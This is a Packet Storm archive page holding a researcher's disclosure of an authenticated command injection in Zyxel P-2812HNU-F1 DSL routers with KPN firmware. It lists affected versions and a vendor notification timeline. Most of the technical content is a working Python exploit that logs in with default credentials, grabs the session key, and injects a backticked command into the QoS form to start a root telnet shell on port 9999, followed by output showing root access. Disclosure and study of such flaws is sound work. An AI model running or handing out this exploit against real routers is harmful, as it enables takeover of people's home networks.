Twenty Year Anniversary

Zyxel P-2812HNU-F1 DSL Router Command Injection

Zyxel P-2812HNU-F1 DSL Router Command Injection
Posted Sep 29, 2017
Authored by Willem de Groot

The Zyxel P-2812HNU-F1 DSL router suffers from a remote command injection vulnerability. Firmware versions V3.11TUE3 (KPN) and V3.11TUE8 (KPN) are affected.

tags | exploit, remote
MD5 | 4e96266347da2978416374bfccea7eb7

Zyxel P-2812HNU-F1 DSL Router Command Injection

Change Mirror Download
Zyxel P-2812HNU-F1 DSL router - command injection
=================================================
The Zyxel P-2812 is common in the Netherlands (KPN/Telfort) and Norway
(Telenor). The Dutch firmware is susceptible to authenticated command
injection
through `qos_queue_add.cgi` and the `WebQueueInterface` parameter.

Affected firmware versions
==========================
V3.11TUE3 (KPN)
V3.11TUE8 (KPN)

Not affected
============
BLN.18 and up (Telenor)

Disclosure timeline
===================
2017-02-05 Notified cert@kpn-cert.nl
2017-02-11 Notified cert@telenor.net
2017-02-15 KPN: "escalated to Zyxel"
2017-02-23 Telenor: "we have fixed this previously in BLN18"
2017-09-28 Public disclosure

Proof of concept code
=====================
Sample code at
http://gwillem.gitlab.io/2017/09/28/hacking-the-zyxel-p-2812hnu-f1/

#!/usr/bin/env python3
# 2017-02-03 gwillem@gmail.com

import requests
import re

USER = 'user'
PASS = '1234'
URL = 'http://192.168.1.254/'
CMD = '/sbin/telnetd -l/bin/sh -p9999 &'

s = requests.Session()
s.post(URL + 'login.cgi', data=dict(
UserName=USER,
password=PASS,
hiddenPassword=PASS,
submitValue='1'))
r = s.get(URL + 'fileuser_mod.cgi')
assert 'sessionKey' in r.text, r.text

sessionkey = re.search("gblsessionKey = '(.+?)'", r.text).group(1)
assert len(sessionkey) > 24, sessionkey

r = s.post(URL + 'qos_queue_add.cgi', data=dict(
Submit='Apply',
QueueObjectIndex='15',
QueueNameTxt='test',
WebQueueInterface='WAN`%s`' % CMD,
WebQueuePriority='1',
WebQueueWeight='1',
sessionKey=sessionkey,
))

if "window.parent.document.activePage('network-qos',1)" in r.text:
print("Success, root shell at port 9999")
else:
print("Did not work, see output:\n" + r.text)

Working?

$ ./open-sesame.py
Success!
$ telnet 192.168.1.1 9999
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
# id
uid=0(root) gid=0(root)



Observations
============
Security fixes for branded Zyxel firmware are not necessarily implemented
by all OEM clients.


--
Willem de Groot
https://twitter.com/gwillem
https://gwillem.gitlab.io

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    3 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    18 Files
  • 6
    Sep 6th
    18 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    2 Files
  • 9
    Sep 9th
    2 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    17 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    29 Files
  • 14
    Sep 14th
    21 Files
  • 15
    Sep 15th
    3 Files
  • 16
    Sep 16th
    1 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    16 Files
  • 19
    Sep 19th
    29 Files
  • 20
    Sep 20th
    18 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close